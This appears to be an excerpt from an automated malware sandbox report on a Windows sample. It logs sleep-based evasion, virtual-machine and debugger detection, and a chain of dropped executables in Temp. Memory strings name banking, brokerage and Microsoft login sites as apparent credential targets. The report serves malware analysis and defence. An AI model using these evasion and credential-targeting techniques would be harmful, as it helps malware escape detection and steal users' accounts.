Source: C:\Users\user\Desktop\file.exe TID: 7340 | Thread sleep count: 38 > 30
Source: C:\Users\user\Desktop\file.exe TID: 7340 | Thread sleep time: -76038s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 7440 | Thread sleep time: -36000s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 7360 | Thread sleep count: 35 > 30
Source: C:\Users\user\Desktop\file.exe TID: 7360 | Thread sleep time: -70035s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 7364 | Thread sleep count: 35 > 30
Source: C:\Users\user\Desktop\file.exe TID: 7364 | Thread sleep time: -70035s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 7344 | Thread sleep count: 32 > 30
Source: C:\Users\user\Desktop\file.exe TID: 7344 | Thread sleep time: -64032s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 7356 | Thread sleep count: 36 > 30
Source: C:\Users\user\Desktop\file.exe TID: 7356 | Thread sleep time: -72036s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 7352 | Thread sleep count: 37 > 30
Source: C:\Users\user\Desktop\file.exe TID: 7352 | Thread sleep time: -74037s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 7348 | Thread sleep count: 33 > 30
Source: C:\Users\user\Desktop\file.exe TID: 7348 | Thread sleep time: -66033s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7796 | Thread sleep count: 65 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7796 | Thread sleep time: -130065s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7772 | Thread sleep count: 54 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7772 | Thread sleep time: -108054s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7748 | Thread sleep count: 53 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7748 | Thread sleep time: -106053s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6732 | Thread sleep count: 210 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6732 | Thread sleep time: -6300000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7688 | Thread sleep count: 47 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7688 | Thread sleep time: -94047s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7784 | Thread sleep count: 54 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7784 | Thread sleep time: -108054s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7800 | Thread sleep count: 49 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7800 | Thread sleep time: -98049s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6732 | Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1012278001\rhnew.exe TID: 1592 | Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1012278001\rhnew.exe TID: 7640 | Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1012279001\e6d73861f4.exe TID: 8040 | Thread sleep time: -34017s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1012279001\e6d73861f4.exe TID: 8172 | Thread sleep time: -34017s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1012279001\e6d73861f4.exe TID: 2676 | Thread sleep count: 239 > 30
Source: C:\Users\user\AppData\Local\Temp\1012279001\e6d73861f4.exe TID: 2676 | Thread sleep count: 104 > 30
Source: C:\Users\user\AppData\Local\Temp\1012279001\e6d73861f4.exe TID: 2676 | Thread sleep count: 85 > 30
Source: C:\Users\user\AppData\Local\Temp\1012279001\e6d73861f4.exe TID: 2676 | Thread sleep count: 188 > 30
Source: C:\Users\user\AppData\Local\Temp\1012279001\e6d73861f4.exe TID: 2676 | Thread sleep count: 180 > 30
Source: C:\Users\user\AppData\Local\Temp\1012279001\e6d73861f4.exe TID: 2676 | Thread sleep count: 82 > 30
Source: C:\Users\user\AppData\Local\Temp\1012279001\e6d73861f4.exe TID: 6532 | Thread sleep time: -30015s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1012279001\e6d73861f4.exe TID: 3404 | Thread sleep time: -30015s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe TID: 1056 | Thread sleep time: -150000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe TID: 7288 | Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe TID: 7340 | Thread sleep time: -30000s >= -30000s
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeLast function: Thread delayed
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeLast function: Thread delayed
                          Source: C:\Users\user\AppData\Local\Temp\1012279001\e6d73861f4.exeLast function: Thread delayed
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C98C930 GetSystemInfo,VirtualAlloc,GetSystemInfo,VirtualFree,VirtualAlloc,0_2_6C98C930
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread delayed: delay time: 30000Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread delayed: delay time: 30000Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                          Source: file.exe, file.exe, 00000000.00000002.2728347677.0000000000E6C000.00000040.00000001.01000000.00000003.sdmp, EBFBFBFIIJ.exe, 00000015.00000002.2786447467.00000000010C3000.00000040.00000001.01000000.0000000B.sdmp, EBFBFBFIIJ.exe, 00000015.00000000.2709233788.00000000010C3000.00000080.00000001.01000000.0000000B.sdmp, skotes.exe, 00000016.00000002.3422222581.0000000000A73000.00000040.00000001.01000000.0000000D.sdmp, skotes.exe, 00000016.00000000.2764513854.0000000000A73000.00000080.00000001.01000000.0000000D.sdmp, rhnew.exe, 00000019.00000002.2972003227.0000000000F18000.00000040.00000001.01000000.0000000E.sdmp, e6d73861f4.exe, 0000001A.00000002.3420356768.00000000009A3000.00000040.00000001.01000000.0000000F.sdmp, fc1511c233.exe, 0000001B.00000002.3421076285.0000000001072000.00000040.00000001.01000000.00000010.sdmp, 6ae2430bb1.exe, 0000001C.00000002.3260069357.0000000000C7C000.00000040.00000001.01000000.00000011.sdmp, fc1511c233.exe, 00000020.00000002.3320776369.0000000001072000.00000040.00000001.01000000.00000010.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                          Source: fc1511c233.exe, 0000001B.00000003.3276521999.0000000005C45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                          Source: skotes.exe, 00000016.00000002.3432522788.0000000001077000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWgG2
                          Source: file.exe, 00000000.00000002.2729388458.00000000015A7000.00000004.00000020.00020000.00000000.sdmp, e6d73861f4.exe, 0000001A.00000002.3429327881.0000000000EFA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW8
                          Source: fc1511c233.exe, 0000001B.00000003.3276521999.0000000005C45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                          Source: fc1511c233.exe, 0000001B.00000003.3276521999.0000000005C45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
                          Source: fc1511c233.exe, 0000001B.00000003.3276521999.0000000005C45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696487552f
                          Source: fc1511c233.exe, 0000001B.00000003.3276521999.0000000005C45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696487552x
                          Source: fc1511c233.exe, 0000001B.00000003.3276521999.0000000005C45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
                          Source: file.exe, 00000000.00000002.2729388458.00000000015D4000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000016.00000002.3432522788.0000000001095000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000016.00000002.3432522788.0000000001051000.00000004.00000020.00020000.00000000.sdmp, rhnew.exe, 00000019.00000002.2972914286.000000000132F000.00000004.00000020.00020000.00000000.sdmp, rhnew.exe, 00000019.00000002.2972741556.00000000012DE000.00000004.00000020.00020000.00000000.sdmp, rhnew.exe, 00000019.00000003.2971218158.000000000132F000.00000004.00000020.00020000.00000000.sdmp, rhnew.exe, 00000019.00000003.2971598863.000000000132F000.00000004.00000020.00020000.00000000.sdmp, e6d73861f4.exe, 0000001A.00000002.3439588929.00000000055E6000.00000004.00000020.00020000.00000000.sdmp, fc1511c233.exe, 0000001B.00000002.3428013900.0000000001441000.00000004.00000020.00020000.00000000.sdmp, fc1511c233.exe, 0000001B.00000002.3428013900.00000000013EE000.00000004.00000020.00020000.00000000.sdmp, 6ae2430bb1.exe, 0000001C.00000002.3262194656.0000000001455000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                          Source: fc1511c233.exe, 0000001B.00000003.3276521999.0000000005C45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696487552
                          Source: firefox.exe, 0000002F.00000002.3443090623.000001F93E1C7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW : 2 : 34 : 1 : 1 : 0x20026 : 0x8 : %SystemRoot%\system32\mswsock.dll : : 1234191b-4bf7-4ca7-86e0-dfd7c32b5445
                          Source: fc1511c233.exe, 0000001B.00000003.3276521999.0000000005C45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                          Source: fc1511c233.exe, 0000001B.00000003.3276521999.0000000005C45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                          Source: fc1511c233.exe, 0000001B.00000003.3275205487.0000000005B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696487552p
                          Source: fc1511c233.exe, 0000001B.00000003.3276521999.0000000005C45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696487552
                          Source: fc1511c233.exe, 0000001B.00000003.3276521999.0000000005C45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696487552o
                          Source: firefox.exe, 0000002F.00000002.3439700563.000001F9341A4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RA
                          Source: firefox.exe, 0000002F.00000002.3439700563.000001F934160000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`
                          Source: fc1511c233.exe, 0000001B.00000003.3276521999.0000000005C45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696487552
                          Source: fc1511c233.exe, 0000001B.00000003.3276521999.0000000005C45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
                          Source: fc1511c233.exe, 0000001B.00000003.3276521999.0000000005C45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696487552
                          Source: fc1511c233.exe, 0000001B.00000003.3276521999.0000000005C45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696487552j
                          Source: fc1511c233.exe, 0000001B.00000003.3276521999.0000000005C45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
                          Source: fc1511c233.exe, 0000001B.00000003.3276521999.0000000005C45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                          Source: file.exe, 00000000.00000002.2727922118.0000000000AA1000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2156119488.0000000005320000.00000004.00001000.00020000.00000000.sdmp, 6ae2430bb1.exe, 0000001C.00000002.3259318138.00000000008B1000.00000040.00000001.01000000.00000011.sdmp, 6ae2430bb1.exe, 0000001C.00000003.3200675680.0000000005280000.00000004.00001000.00020000.00000000.sdmp, 6ae2430bb1.exe, 00000030.00000003.3348999903.0000000004BB0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: iMSHN6QKQEMUh;=a
                          Source: file.exe, 00000000.00000002.2729388458.000000000155E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware&
                          Source: file.exe, 00000000.00000002.2727922118.0000000000AA1000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2156119488.0000000005320000.00000004.00001000.00020000.00000000.sdmp, 6ae2430bb1.exe, 0000001C.00000002.3259318138.00000000008B1000.00000040.00000001.01000000.00000011.sdmp, 6ae2430bb1.exe, 0000001C.00000003.3200675680.0000000005280000.00000004.00001000.00020000.00000000.sdmp, 6ae2430bb1.exe, 00000030.00000003.3348999903.0000000004BB0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: MSHN6QKQEMU
                          Source: fc1511c233.exe, 0000001B.00000003.3276521999.0000000005C45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
                          Source: fc1511c233.exe, 0000001B.00000003.3276521999.0000000005C45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                          Source: fc1511c233.exe, 0000001B.00000003.3276521999.0000000005C45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                          Source: fc1511c233.exe, 0000001B.00000003.3276521999.0000000005C45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                          Source: fc1511c233.exe, 0000001B.00000003.3276521999.0000000005C45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696487552t
                          Source: fc1511c233.exe, 0000001B.00000003.3276521999.0000000005C45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                          Source: 6ae2430bb1.exe, 0000001C.00000002.3262194656.000000000140E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                          Source: fc1511c233.exe, 0000001B.00000003.3276521999.0000000005C45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                          Source: fc1511c233.exe, 0000001B.00000003.3276521999.0000000005C45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                          Source: fc1511c233.exe, 0000001B.00000003.3276521999.0000000005C45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696487552s
                          Source: fc1511c233.exe, 0000001B.00000003.3276521999.0000000005C45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                          Source: fc1511c233.exe, 0000001B.00000003.3276521999.0000000005C45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696487552t
                          Source: fc1511c233.exe, 0000001B.00000003.3276521999.0000000005C45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
                          Source: 1b3b76c439.exe, 00000021.00000003.3391908795.00000000008C3000.00000004.00000020.00020000.00000000.sdmp, 1b3b76c439.exe, 00000021.00000003.3391498439.00000000008C0000.00000004.00000020.00020000.00000000.sdmp, 1b3b76c439.exe, 00000021.00000003.3393067363.00000000008FC000.00000004.00000020.00020000.00000000.sdmp, 1b3b76c439.exe, 00000021.00000003.3392141199.00000000008E9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWYGMo
                          Source: file.exe, 00000000.00000002.2728347677.0000000000E6C000.00000040.00000001.01000000.00000003.sdmp, EBFBFBFIIJ.exe, 00000015.00000002.2786447467.00000000010C3000.00000040.00000001.01000000.0000000B.sdmp, skotes.exe, 00000016.00000002.3422222581.0000000000A73000.00000040.00000001.01000000.0000000D.sdmp, rhnew.exe, 00000019.00000002.2972003227.0000000000F18000.00000040.00000001.01000000.0000000E.sdmp, e6d73861f4.exe, 0000001A.00000002.3420356768.00000000009A3000.00000040.00000001.01000000.0000000F.sdmp, fc1511c233.exe, 0000001B.00000002.3421076285.0000000001072000.00000040.00000001.01000000.00000010.sdmp, 6ae2430bb1.exe, 0000001C.00000002.3260069357.0000000000C7C000.00000040.00000001.01000000.00000011.sdmp, fc1511c233.exe, 00000020.00000002.3320776369.0000000001072000.00000040.00000001.01000000.00000010.sdmp, skotes.exe, 00000022.00000002.3352655182.0000000000A73000.00000040.00000001.01000000.0000000D.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                          Source: fc1511c233.exe, 0000001B.00000003.3276521999.0000000005C45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
                          Source: fc1511c233.exe, 0000001B.00000003.3276521999.0000000005C45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                          Source: EBFBFBFIIJ.exe, 00000015.00000000.2709233788.00000000010C3000.00000080.00000001.01000000.0000000B.sdmp, skotes.exe, 00000016.00000000.2764513854.0000000000A73000.00000080.00000001.01000000.0000000D.sdmp, skotes.exe, 00000022.00000000.3284485521.0000000000A73000.00000080.00000001.01000000.0000000D.sdmpBinary or memory string: \\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                          Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                          Anti Debugging

                          Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exe | Thread information set: HideFromDebugger
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Thread information set: HideFromDebugger
                          Source: C:\Users\user\AppData\Local\Temp\1012278001\rhnew.exe | Thread information set: HideFromDebugger
                          Source: C:\Users\user\AppData\Local\Temp\1012279001\e6d73861f4.exe | Thread information set: HideFromDebugger
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe | Thread information set: HideFromDebugger
                          Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exe | Thread information set: HideFromDebugger
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe | Thread information set: HideFromDebugger
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Thread information set: HideFromDebugger
                          Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exe | Thread information set: HideFromDebugger
                          Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exe | Open window title or class name: regmonclass
                          Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exe | Open window title or class name: gbdyllo
                          Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
                          Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exe | Open window title or class name: procmon_window_class
                          Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
                          Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exe | Open window title or class name: ollydbg
                          Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exe | Open window title or class name: filemonclass
                          Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
                          Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exe | File opened: NTICE
                          Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exe | File opened: SICE
                          Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exe | File opened: SIWVID
                          Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
                          Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
                          Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exe | Process queried: DebugPort
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exe | Process queried: DebugPort
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exe | Process queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Process queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Process queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Process queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\1012278001\rhnew.exe | Process queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\1012278001\rhnew.exe | Process queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\1012278001\rhnew.exe | Process queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\1012279001\e6d73861f4.exe | Process queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\1012279001\e6d73861f4.exe | Process queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\1012279001\e6d73861f4.exe | Process queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe | Process queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe | Process queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe | Process queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exe | Process queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exe | Process queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exe | Process queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe | Process queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe | Process queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe | Process queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Process queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Process queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Process queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exe | Process queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exe | Process queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exe | Process queried: DebugPort
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exe | Code function: 21_2_056B027E rdtsc 21_2_056B027E
                          Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_6C9D5FF0 IsDebuggerPresent,??0PrintfTarget@mozilla@@IAE@XZ,?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z,OutputDebugStringA,__acrt_iob_func,_fileno,_dup,_fdopen,__stdio_common_vfprintf,fclose,0_2_6C9D5FF0
                          Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_6C973480 ?ComputeProcessUptime@TimeStamp@mozilla@@CA_KXZ,GetCurrentProcess,GetProcessTimes,LoadLibraryW,GetProcAddress,__Init_thread_footer,__aulldiv,FreeLibrary,GetSystemTimeAsFileTime,0_2_6C973480
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exe | Code function: 21_2_00F0652B mov eax, dword ptr fs:[00000030h] 21_2_00F0652B
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exe | Code function: 21_2_00F0A302 mov eax, dword ptr fs:[00000030h] 21_2_00F0A302
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Code function: 22_2_008BA302 mov eax, dword ptr fs:[00000030h] 22_2_008BA302
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Code function: 22_2_008B652B mov eax, dword ptr fs:[00000030h] 22_2_008B652B
                          Source: C:\Windows\SysWOW64\taskkill.exe | Process token adjusted: Debug
                          Source: C:\Windows\SysWOW64\taskkill.exe | Process token adjusted: Debug
                          Source: C:\Windows\SysWOW64\taskkill.exe | Process token adjusted: Debug
                          Source: C:\Windows\SysWOW64\taskkill.exe | Process token adjusted: Debug
                          Source: C:\Windows\SysWOW64\taskkill.exe | Process token adjusted: Debug
                          Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_6C9AB66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_6C9AB66C
                          Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_6C9AB1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6C9AB1F7
                          Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_6CB5AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6CB5AC62
                          Source: C:\Users\user\Desktop\file.exe | Memory protected: page guard

                          HIPS / PFW / Operating System Protection Evasion

                          Source: Yara match | File source: Process Memory Space: file.exe PID: 7276, type: MEMORYSTR
                          Source: Yara match | File source: Process Memory Space: 6ae2430bb1.exe PID: 5396, type: MEMORYSTR
                          Source: Yara match | File source: Process Memory Space: 6ae2430bb1.exe PID: 6464, type: MEMORYSTR
                          Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\Documents\EBFBFBFIIJ.exe"
                          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\Documents\EBFBFBFIIJ.exe "C:\Users\user\Documents\EBFBFBFIIJ.exe"
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exe | Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Process created: C:\Users\user\AppData\Local\Temp\1012278001\rhnew.exe "C:\Users\user\AppData\Local\Temp\1012278001\rhnew.exe"
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Process created: C:\Users\user\AppData\Local\Temp\1012279001\e6d73861f4.exe "C:\Users\user\AppData\Local\Temp\1012279001\e6d73861f4.exe"
